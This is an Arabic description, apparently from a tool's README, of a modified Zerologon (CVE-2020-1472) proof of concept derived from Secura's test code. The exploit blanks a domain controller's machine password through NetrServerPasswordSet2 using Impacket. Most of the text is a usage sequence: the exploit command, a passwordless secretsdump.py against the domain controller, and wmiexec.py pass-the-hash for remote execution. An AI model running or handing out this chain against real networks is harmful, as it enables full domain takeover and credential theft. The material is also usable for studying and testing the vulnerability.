
تم تعديل الـ PoC الاختبارية من Secura، CVE-2020-1472، لتغيير كلمة مرور الجهاز إلى null
تم تعديل إثبات المفهوم (PoC) الاختباري من Secura، CVE-2020-1472، لتغيير كلمة مرور الجهاز إلى قيمة فارغة. يستخدم تغيير كلمة المرور على الجهاز دالة NetrServerPasswordSet2() من Microsoft. يستغل هذا الاستغلال وحدة nrpc.py من Impacket لاستدعاء NetrServerPasswordSet2().
./zerologon_NULLPASS.py <dc-name> <dc-ip>

secretsdump.py -no-pass <dc-name>\$@<dc-ip>

wmiexec.py -hashes <LM:NT> <username>@<ip>
